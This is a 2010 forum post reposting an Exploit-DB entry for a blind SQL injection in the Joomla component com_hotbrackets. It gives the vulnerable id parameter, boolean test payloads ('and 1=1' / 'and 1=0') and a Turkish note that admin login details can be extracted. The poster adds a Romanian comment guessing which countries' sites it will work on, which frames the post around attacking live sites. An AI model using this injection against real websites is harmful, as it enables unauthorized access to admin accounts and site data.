hozarares Posted January 5, 2010 Report Posted January 5, 2010 # Title: Joomla Component com_hotbrackets Blind SQL Injection Vulnerability # EDB-ID: 10953 # CVE-ID: () # OSVDB-ID: () # Author: FL0RiX # Published: 2010-01-03 view sourceprint?<------------------- header data start ------------------- > ############################################################# # Joomla Component com_hotbrackets Blind SQL injection Vulnerability ############################################################# # author : Fl0riX # Name : com_hotbrackets # Bug Type : Blind SQL Injection # Infection : Admin login bilgileri al?nabilir. # Demo Vuln. : TRUE(+) » server and 1=1 FALSE(-) » server and 1=0 # Bug Fix Advice : Zararl? karakterler filtrelenmelidir. ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > path/index.php?option=com_hotbrackets&id=[blind] < -- bug code end of -- > ##########################################################Nu a fost verificata aceata vulnerabilitate dar cred ca functioneaza doar pe site`urile turcesti , arabe , iraniene si cateva italiene...... Quote
